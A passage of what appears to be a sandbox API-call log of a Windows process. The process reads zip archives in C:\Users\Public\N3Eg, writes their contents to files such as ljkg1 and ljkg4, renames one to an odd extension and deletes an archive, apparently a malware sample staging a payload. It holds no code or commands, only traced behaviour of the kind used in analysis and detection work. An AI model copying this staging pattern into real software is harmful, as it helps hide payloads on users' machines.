lpOverlapped=0x0) returned 1 [0020.826] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.827] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.827] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.828] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.828] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.829] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.829] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.830] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.830] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.831] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.831] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.832] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.832] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.833] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.833] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.834] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.834] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.835] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.835] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.836] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.836] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.837] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1d3, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.837] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.838] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ff, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.838] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.838] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.839] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.839] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.840] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.840] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.841] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.841] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.842] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.842] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ff, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.843] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.843] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.844] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.844] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.845] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.845] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.846] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.846] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.847] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.847] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ff, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.847] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.848] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.848] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.849] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.849] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.850] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ff, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.858] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.859] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.859] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.860] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.860] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.861] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.861] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.862] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.862] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.863] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ff, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.863] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.864] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ff, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.864] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.864] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.865] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.865] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1ff, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.866] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x18a, lpOverlapped=0x0) returned 1 [0020.867] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.868] CloseHandle (hObject=0x2b4) returned 1 [0020.876] CloseHandle (hObject=0x2b0) returned 1 [0020.877] wcslen (_String="C:\\Users\\Public\\N3Eg\\ljkg4") returned 0x1a [0020.877] wcscpy (in: _Dest=0x15010cc0, _Source="C:\\Users\\Public\\N3Eg\\ljkg4" | out: _Dest="C:\\Users\\Public\\N3Eg\\ljkg4") returned="C:\\Users\\Public\\N3Eg\\ljkg4" [0020.878] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E") returned 0x20 [0020.878] wcscpy (in: _Dest=0xb4d9c8, _Source="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E") returned="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E" [0020.878] _wrename (_OldFileName="C:\\Users\\Public\\N3Eg\\ljkg4", _NewFileName="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E") returned 0 [0020.881] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg4.zip") returned 0x1e [0020.882] wcscpy (in: _Dest=0x1501c100, _Source="C:\\Users\\Public\\N3Eg\\N3Eg4.zip" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg4.zip") returned="C:\\Users\\Public\\N3Eg\\N3Eg4.zip" [0020.882] SetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg4.zip", dwFileAttributes=0x80) returned 1 [0020.882] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg4.zip") returned 0x80 [0020.882] DeleteFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg4.zip" (normalized: "c:\\users\\public\\n3eg\\n3eg4.zip")) returned 1 [0020.888] wcslen (_String="C:\\Users\\Public\\N3Eg") returned 0x14 [0020.888] wcscpy (in: _Dest=0xb9a3b0, _Source="C:\\Users\\Public\\N3Eg" | out: _Dest="C:\\Users\\Public\\N3Eg") returned="C:\\Users\\Public\\N3Eg" [0020.888] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg", nBufferLength=0x9, lpBuffer=0x4bf3c0, lpFilePart=0x4bf3bc | out: lpBuffer="", lpFilePart=0x4bf3bc) returned 0x15 [0020.888] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\N3Eg", fInfoLevelId=0x0, lpFileInformation=0x4bf3b0 | out: lpFileInformation=0x4bf3b0) returned 1 [0020.888] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg1.zip") returned 0x1e [0020.888] wcscpy (in: _Dest=0x1501c100, _Source="C:\\Users\\Public\\N3Eg\\N3Eg1.zip" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg1.zip") returned="C:\\Users\\Public\\N3Eg\\N3Eg1.zip" [0020.889] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg1.zip" (normalized: "c:\\users\\public\\n3eg\\n3eg1.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b0 [0020.889] calloc (_Count=0x1, _Size=0x38) returned 0xb9a3b0 [0020.889] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd294, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bd25c, lpOverlapped=0x0 | out: lpBuffer=0x4bd294*, lpNumberOfBytesRead=0x4bd25c*=0x1e, lpOverlapped=0x0) returned 1 [0020.889] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd294, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x4bd25c, lpOverlapped=0x0 | out: lpBuffer=0x4bd294*, lpNumberOfBytesRead=0x4bd25c*=0x5, lpOverlapped=0x0) returned 1 [0020.890] wcslen (_String="C:\\Users\\Public\\N3Eg") returned 0x14 [0020.890] wcscpy (in: _Dest=0xb9a3f0, _Source="C:\\Users\\Public\\N3Eg" | out: _Dest="C:\\Users\\Public\\N3Eg") returned="C:\\Users\\Public\\N3Eg" [0020.890] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg", nBufferLength=0x9, lpBuffer=0x4bf390, lpFilePart=0x4bf38c | out: lpBuffer="", lpFilePart=0x4bf38c) returned 0x15 [0020.890] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\N3Eg", fInfoLevelId=0x0, lpFileInformation=0x4bf380 | out: lpFileInformation=0x4bf380) returned 1 [0020.890] wcslen (_String="C:\\Users\\Public\\N3Eg\\ljkg1") returned 0x1a [0020.890] wcscpy (in: _Dest=0x15010cc0, _Source="C:\\Users\\Public\\N3Eg\\ljkg1" | out: _Dest="C:\\Users\\Public\\N3Eg\\ljkg1") returned="C:\\Users\\Public\\N3Eg\\ljkg1" [0020.890] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\ljkg1" (normalized: "c:\\users\\public\\n3eg\\ljkg1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b4 [0020.891] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.892] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x35d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.893] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.894] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x33f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.894] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.895] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.895] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.896] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.896] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.897] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.898] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.898] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.899] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.899] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x38f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.900] ReadFile 